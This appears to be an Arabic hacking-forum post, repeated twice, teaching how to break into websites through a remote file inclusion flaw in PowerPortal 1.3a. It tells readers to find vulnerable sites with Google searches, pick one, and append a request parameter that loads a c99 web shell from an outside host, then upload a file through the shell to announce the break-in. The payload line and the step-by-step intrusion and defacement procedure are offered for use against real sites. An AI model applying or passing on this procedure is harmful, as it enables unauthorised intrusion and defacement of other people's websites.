الرئيسية
البوابة
التسجيل
دخول
السلام عليكم ورحمه الله وبركاته ..
تفضلو الدرس
بسم الله الرحمن الرحيم
نبدأ الدرس
(درس إختراق المواقع عن طريق ثغرات الفايل انكلود)
اول شىء ندخل إلى موقع من مواقع الثغرات
تظهر لنا الصورة التالية :
ننزل إلى القسم المسمى
WEb apps
و نختار اول ثغرة من الأعلى المسماة بإسم
PowerPortal 1.3a (index.php) Remote File Include Vulnerability
الان نقوم بشرح اسم الثغرة
اول جزء
PowerPortal 1.3a
هذا اسم الإسكربت المصاب بالثغرة
(index.php)
هذا اسم الملف المصاب
Remote File Include Vulnerability
هذا نوع الثغرة و واضح انها من نوع فايل انكلود و هذا اسهل نوع من انواع الثغرات تقريبا
تظهر لنا الثغرة بهذا الشكل و الشرح على الصورة
الان فهمنا كل اجزاء الثغرة و طبعا هذا يرجع إلى قوتك فى اللغة الإنجليزية
الان ندخل إلى جوجل و نكتب الجزء الذى لونته فى الصورة السابقة لكى تظهر لنا المواقع المصابة
سنقوم بإختيار موقع منهم و نتابع الصورة :
الان سنحذف كلمة
top.php
و نضغط الاتى
كود:
/index.php?file_name[]=http://www.soqor.net/tools/c99.txt?
بعد اسم الموقع
و نضغط
enter
لكى تظهر لنا الصفحة التالية
الان ننزل إلى اسفل الصفحة إلى خانة
upload
و نضغط على زر
browse
لكى نحدد ملف لكى نرفعه لنعلن عن اختراقنا للموقع
و نضغط
upload
كما فى الصورة
والنتيجه
تم بحمد الله الدرس
تفضلو الدرس
بسم الله الرحمن الرحيم
نبدأ الدرس
(درس إختراق المواقع عن طريق ثغرات الفايل انكلود)
اول شىء ندخل إلى موقع من مواقع الثغرات
تظهر لنا الصورة التالية :
ننزل إلى القسم المسمى
WEb apps
| . |
و نختار اول ثغرة من الأعلى المسماة بإسم
PowerPortal 1.3a (index.php) Remote File Include Vulnerability
الان نقوم بشرح اسم الثغرة
اول جزء
PowerPortal 1.3a
هذا اسم الإسكربت المصاب بالثغرة
(index.php)
هذا اسم الملف المصاب
Remote File Include Vulnerability
هذا نوع الثغرة و واضح انها من نوع فايل انكلود و هذا اسهل نوع من انواع الثغرات تقريبا
تظهر لنا الثغرة بهذا الشكل و الشرح على الصورة
الان فهمنا كل اجزاء الثغرة و طبعا هذا يرجع إلى قوتك فى اللغة الإنجليزية
الان ندخل إلى جوجل و نكتب الجزء الذى لونته فى الصورة السابقة لكى تظهر لنا المواقع المصابة
سنقوم بإختيار موقع منهم و نتابع الصورة :
الان سنحذف كلمة
top.php
و نضغط الاتى
كود:
/index.php?file_name[]=http://www.soqor.net/tools/c99.txt?
بعد اسم الموقع
و نضغط
enter
لكى تظهر لنا الصفحة التالية
الان ننزل إلى اسفل الصفحة إلى خانة
upload
و نضغط على زر
browse
لكى نحدد ملف لكى نرفعه لنعلن عن اختراقنا للموقع
و نضغط
upload
كما فى الصورة
والنتيجه
تم بحمد الله الدرس
